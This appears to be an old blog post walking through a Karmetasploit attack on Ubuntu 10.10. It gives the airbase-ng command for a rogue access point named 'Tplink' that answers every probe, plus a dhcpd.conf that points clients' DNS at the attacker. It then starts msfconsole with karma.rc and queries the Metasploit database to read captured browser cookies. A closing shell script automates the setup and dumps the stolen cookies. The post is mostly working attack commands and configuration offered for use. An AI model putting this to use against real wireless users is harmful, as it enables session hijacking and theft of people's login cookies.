Setting up Karmetasploit in Ubuntu 10.10


This is an old post that sat in drafts after I saved the link that teaches how to run Karmetasploit. What we do here is run the Karmetasploit module and start sniffing cookies into our database: the post walks through the commands typed, in order, until cookies show up in the database.

# wlan0 must already be in monitor mode (airmon-ng). -P answers every probe request,
# -C 30 beacons each probed ESSID for 30 seconds, -e sets our own ESSID, -v is verbose.
airbase-ng -P -C 30 -e "Tplink" -v wlan0

# at0 is the tap interface airbase-ng creates; it gets the gateway address.
ifconfig at0 up 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
ifconfig wlan0 mtu 1800

# Let the manually started dhcpd3 and the init script share one pid file,
# then serve the config below on at0 only.
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

# Same daemon via the init script; if you run this too, check that only one
# dhcpd3 ends up serving at0 (pgrep -l dhcpd3).
/etc/init.d/dhcp3-server start

msfconsole -r karma.rc

These are the setup commands that get Karmetasploit fully working on my machine. They assume airbase-ng is up and running and msfconsole is ready to use. The other thing you need is a dhcpd.conf; if you don't already know how to write one, here is mine, and it works with the dhcpd3 command above.

/etc/dhcp3/dhcpd.conf

# Clients are told to use the attacker box for DNS; karma.rc starts the fake
# DNS server that resolves every name to us.
option domain-name-servers 192.168.2.1;
# Short leases, so clients re-request quickly while testing.
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;

# The pool handed out on at0: .1 is the attacker box, clients get .2 upwards.
subnet 192.168.2.0 netmask 255.255.255.0 {
  range 192.168.2.2 192.168.2.254;
  option routers 192.168.2.1;
  option subnet-mask 255.255.255.0;
  option domain-name-servers 192.168.2.1;
}

You will generally use two terminals: one running airbase-ng and one running Metasploit. What you see at the end of the day is airbase-ng creating an access point named Tplink. Once the dhcpd commands are in, and before you start msfconsole, other machines should already be able to connect to the access point. When one connects, check that the address it gets from DHCP starts at 192.168.2.2, the first address of the range in dhcpd.conf; a client that gets no address, or a self-assigned 169.254.x.x one, means dhcpd is not answering on at0. This is where most of the trouble is. Once you run msfconsole -r karma.rc you are all set to sniff for cookies. If you don't have karma.rc, the Karmetasploit Configuration page in the sources below links to it.

Once Metasploit is running, use another machine to connect to the access point and try visiting google.com. You should get a black HTML page whose bottom keeps loading site after site: that is Karmetasploit's capture page pulling in each site so that the client's browser sends its cookies for that site to our fake server. When that page has finished loading, go back to your attack station and query the database for the cookies you have sniffed. The Karmetasploit Attack Analysis page in the sources shows one way to read them; I use PostgreSQL rather than the database shown there, so I read the cookies differently.

sudo -s
su postgres              # switch to the postgres superuser
psql msf_database_name   # your Metasploit database
select * from notes;     -- Karmetasploit stores captured cookies as notes
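The whole procedure above, the access point and DHCP setup as well as the read-out of the notes table, as one added shell script. This is my own example, not the post's or Metasploit's code. It assumes the interface names wlan0 and at0, the 192.168.2.0/24 pool from the dhcpd.conf above, the Ubuntu 10.10 dhcp3 paths, a Metasploit database called msf_database_name, and that the cookie notes carry an ntype starting with "http" (check with select distinct ntype from notes;). The lease checks run without any wireless hardware; the live setup only runs when you pass "setup".

```shell
#!/bin/sh
# Added example, not the post's own script: the setup steps as functions with
# the checks that usually show why a client gets no lease, plus a read-out of
# the notes table. Assumed: interfaces wlan0/at0, the 192.168.2.0/24 pool from
# the dhcpd.conf in the post, Ubuntu 10.10 dhcp3 paths, a database named
# msf_database_name, cookie notes whose ntype starts with "http".

AP_IF=wlan0                  # wireless card, already in monitor mode
TAP_IF=at0                   # tap interface airbase-ng creates
GW=192.168.2.1
DHCP_CONF=/etc/dhcp3/dhcpd.conf
LEASES=/var/lib/dhcp3/dhcpd.leases
MSF_DB=msf_database_name     # assumed name of the Metasploit database

# 0 if $1 is an IPv4 address inside the handed-out range 192.168.2.2-254; anything
# else (no address, 169.254.x.x, the gateway .1) means dhcpd never answered on at0.
ip_in_pool() {
    case "$1" in
        192.168.2.*.*) return 1 ;;
        192.168.2.*) ;;
        *) return 1 ;;
    esac
    last=${1##*.}
    case "$last" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$last" -ge 2 ] && [ "$last" -le 254 ]
}

# Number of leases in state "active" inside the pool, from a dhcpd.leases
# file ($1). The file is append-only, so an IP can appear in several blocks
# and its last "binding state" line wins: track the state per address.
active_leases_in_pool() {
    awk '
        $1 == "lease"                    { ip = $2 }
        $1 == "binding" && $2 == "state" { sub(/;$/, "", $3); state[ip] = $3 }
        END {
            n = 0
            for (ip in state) {
                split(ip, o, ".")
                if (state[ip] == "active" && o[1] == 192 && o[2] == 168 &&
                    o[3] == 2 && o[4] >= 2 && o[4] <= 254) n++
            }
            print n
        }' "$1"
}

# Constructed, abridged leases file (not a real capture) written to $1 so the
# parser can be tried without a live access point: .2 is freed then re-leased.
write_sample_leases() {
    cat > "$1" <<'EOF'
lease 192.168.2.2 {
  binding state free;
  hardware ethernet 00:11:22:33:44:55;
}
lease 192.168.2.3 {
  binding state active;
  hardware ethernet 66:77:88:99:aa:bb;
}
lease 192.168.2.2 {
  binding state active;
  hardware ethernet 00:11:22:33:44:55;
}
EOF
}

# The live setup: start airbase-ng in another terminal first, then run this as root.
karma_setup() {
    i=0
    while ! ifconfig "$TAP_IF" >/dev/null 2>&1; do   # at0 exists only once airbase-ng is up
        i=$((i + 1))
        [ "$i" -lt 10 ] || { echo "$TAP_IF never appeared; is airbase-ng running?" >&2; return 1; }
        sleep 1
    done
    ifconfig "$TAP_IF" up "$GW" netmask 255.255.255.0
    ifconfig "$TAP_IF" mtu 1400
    ifconfig "$AP_IF" mtu 1800
    # Exactly one dhcpd3 serving at0; do not also start the init script copy.
    if pgrep -x dhcpd3 >/dev/null; then
        echo "dhcpd3 already running, not starting another" >&2
    else
        ln -sf /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
        dhcpd3 -cf "$DHCP_CONF" "$TAP_IF" || return 1
    fi
    echo "active leases in pool: $(active_leases_in_pool "$LEASES")"
    msfconsole -r karma.rc
}

# Captured cookies from the notes table, oldest first.
dump_cookies() {
    sudo -u postgres psql -d "$MSF_DB" -At -c \
        "select created_at, ntype, data from notes where ntype like 'http%' order by created_at;"
}

case "${1:-}" in
    setup)   karma_setup ;;
    cookies) dump_cookies ;;
esac
```

Run it as root with `sh karma-setup.sh setup` after airbase-ng is up, and `sh karma-setup.sh cookies` once the victim's capture page has loaded. The parser is the part worth keeping even if you script nothing else: a client that reports an address for which ip_in_pool fails, or a leases file in which active_leases_in_pool stays at 0 after a client has "connected", points at dhcpd rather than at airbase-ng or Metasploit.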

Source: http://www.offensive-security.com/metasploit-unleashed/Karmetasploit_Configuration
Source: http://www.offensive-security.com/metasploit-unleashed/Karmetasploit_Attack_Analysis
